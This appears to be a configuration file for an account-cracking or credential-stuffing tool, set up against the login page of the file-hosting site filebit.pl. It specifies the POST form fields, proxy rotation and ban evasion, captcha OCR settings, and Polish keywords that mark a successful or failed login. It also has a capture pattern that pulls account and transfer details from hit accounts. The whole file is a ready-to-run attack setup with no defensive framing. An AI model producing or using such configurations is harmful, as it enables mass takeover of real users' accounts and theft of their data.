[Wordlist]
UserIndex=1
PassIndex=2
EmailIndex=0
B2BF51ECDB9C94B6BF17CE016D2A65C5=0
874E401E1A368FBA565B0D67357162A8=15250
81F955206FF9F173296DAD486813904E=0
40EDB4FD72E95A0A878270571BF4D12A=0
8690E206BD54EFF395EB404C8388CB82=0
FD27E1373E9ED4AB0548A6FFFF9FAFAC=0
20D8ED3FEE0B5CD29CF32D36B322B8BD=0
34CB79C1BD75A1F28641B020D31567DF=0
89DAD83FA80D686DAB1A8CDC20E937FC=0
7F5737869EEED26EBAA63F0F9717504F=55
31EA93C480CB30A0787EC83A6D8B6D49=0
36A39E43143A6446F97198A8B5D8A414=0
64F03C1B21E1CD9C1D04AE201D48E2FF=0
D3DED0F5075B0CD1C34AE5F43C492B9D=0
AF8397B7756D6BC22DEEA31178BEC516=0
A2268ADF46DCF76FBC603383360725C7=0
B42F49A869370B08040E556BBD7403AA=0
9C0A67CD0A1F56DE3B9738C6DE7143D7=0
4BC854F2A20A806DBAE641908D1012A5=0
968D21A305FE5639395E10EAEC4662B7=0
521F07C39846B0F50D4E42AE3ECD1158=0
34AF7845445CE8057E4286E59C9514A9=0
964FA57C9EAC164A58113370687D6779=0
A5F990BF10A81D39A7282E844ECE4800=0
1403A0E39A57B7E5A1EBB2AFB58D0AD0=0
2414300E5BE5276E432A1C3BCE0228FF=0
ECA6905830F575EAEC572A5FA4317550=0
E3486A17804F8A0DEE63482F109CD20B=0
5EC76BF09A545D90574310DFC8F69E32=0
1DDC1D6A614DAD383FF6E4D9BCDD030F=0
3B7650485A912953A436CE489F17462A=405141
58E7F15DE54216C288AA1A75C54A1B6A=631
2853C6641371A9786A275E08FB7EC459=0
E22A362950E961959E0A8D55094F7234=0
ABAA58E237F9BBA806E5F4005BC9825E=0
7EABAA70E9E6887103F082B6A9FC0A63=0
A92D770C264334B94F242527E9D196C8=0
63B459E5C50220E550A846AACB1C3723=0
DF0B8D41D4DD1924C90BBCA300C34D4D=0

[Settings]
SiteURL=http://filebit.pl/
Timeout=20
WaitBot=0
ResolveHost=0
ComboFilter=0
ComboMode=0
EmailFilter=0
EmailMode=0
UsernameStart=6
UsernameEnd=8
InvalidChars=
AllowedChars=
Letters=0
Digits=0
Alpha=0
Email=0
LowerUpper=0
LetterDigit=0
SpeciaChar=0
PasswordStart=6
PasswordEnd=8
PasswordInvalidChars=
PasswordAllowedChars=
PasswordLetters=0
PasswordDigits=0
PasswordAlpha=0
PasswordEmail=0
PasswordLowerUpper=0
PasswordLetterDigit=0
PasswordSpeciaChar=0
ProxyActivate=10
ProxyRatio=4
ProxyCombo=0
WaitTime=5
BanWindowWidth=1
BanWindowRatio=10
BanWindowProxies=10
blnNoProxies=1
HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|Referer: http://filebit.pl/|User-Agent: <USER AGENT>|Host: <HOST>|Pragma: no-cache|Connection: keep-alive|
RequestMethod=2
Referer=2
POSTData=login=<USER>&password=<PASS>

[Fake]
AfterFP=1
blnSuccess=0
SuccessRetries=3
blnProcessErrors=0
blnCompleteNot=1
EnableConHits=0
ConHits=0
FollowRedirect=1
EnableConLength=0
ConLength=-1
SourceTags=1
UserField=0
HTTPFollow=1
blnForbToOK=0
ForbToOkLength=1000
blnBadOcrCode=0
BadOcrCodeRetries=3

[Keywords]
EnableHeaderSuccess=1
EnableHeaderBan=0
EnableHeaderFail=1
EnableHeaderRetry=0
HeaderSuccess=Rozpoczynanie;wyloguj
HeaderBan=
HeaderFail=podany;podane
HeaderRetry=
EnableGlobalSourceRetry=1
EnableSourceSuccess=1
EnableSourceBan=0
EnableSourceFail=1
EnableSourceRetry=0
SourceSuccess=Rozpoczynanie;wyloguj
SourceBan=
SourceFail=podany;podane
SourceRetry=

[Form]
IAParse=0
LoginPostData=
LoginMethod=1
LoginHeader=0
Action=http://filebit.pl/panel/login
Username=login
Password=password
Email=
AddData=
CustomData=
NoIndex=
Cookie=PHPSESSID=avbnfb95jkm3h5g295hf2k3gi5
IAction=-1
IUser=-1
IPass=-1
IEmail=-2
ICaptcha=-1
ReqReferer=
ReqCookie=
AjaxURL=
AjaxPOSTData=
AjaxData=
AjaxParsingCode=
RefData=
ParsingCode=
FormRedirectUrl=http://filebit.pl/panel?flowertabs=0
RedPostData=
RedKeys=<Header>||rozpoczynanie;<Source>||rozpoczynanie
DataDesc=Konto&Transfer
CaptureParsingCode=O <span>|<|#00|#00|0|#00|#00|0& ">|<|#00|#00|0|#00|#00|0
RefreshSession=0
RefreshCookie=1
FormHeader=0
AjaxHeader=0
RedHeader=0
IAMethod=2
POSTMethod=2
RedMethod=1
ImageAfterAjax=0
blnBasic=0
FollowRedirectsOnIA=0
FollowRedirectsOnRed=1

[Ajax]
Variables=
PostElements2=
RedURL=

[OCR]
OCRMode=0
URLMode=0
ImageURLID=||
Captcha=
OCRKey=
RefreshCaptcha=0
blnContrast=0
blnBrightness=0
blnSaturation=0
blnThreshold=0
blnInvert=0
blnNoise=0
blnIsolate=0
blnResize=0
blnBorder=0
blnCharExtract=0
blnRemoveColors=0
blnStringFilter=0
blnLetter=1
blnDigits=1
blnBlur=0
blnReconstruct=0
blnLower=0
blnUpper=0
blnRemoveLines=0
blnMultiChar=0
blnCharTable=0
blnPalette=0
blnCharResize=0
blnCharSubExtraction=0
blnThreeImages=0
blnGif=0
blnCompute=0
blnBorderPre=0
Contrast=0
Brightness=0
Saturation=0
Threshold=0
Noise=1
Isolate=1
Resize=2
BorderLeft=0
BorderTop=0
BorderRight=0
BorderBottom=0
CharExtractMinBlack=0
CharExtractMaxBlack=1
CharExtractMinWidth=1
CharRotateMax=0
CharRotateSteps=5
MinLength=1
MaxLength=10
BlurRadius=1
CharExtractMaxWidth=33
CharWidthMinBlack=2
CharSpace=1
Range=0
InvertDensity=0
InvertLength=20
LineCurvatureMax=4
LineWidthMax=13
CharResize=1
CharHeight=13
GifStart=2
GifOffset=2
BorderLeftPre=0
BorderTopPre=0
BorderRightPre=0
BorderBottomPre=0
CharBorderH=5
CharBorderV=5
CharRotateBorder=5
CharExtractMinHeight=1
VerticalRejoin=30
CharExclude=
SpecialChars=
Colors=
Colors2=
Lines=Min Length: 2, Max Width: 5, Horizzontal
Language=eng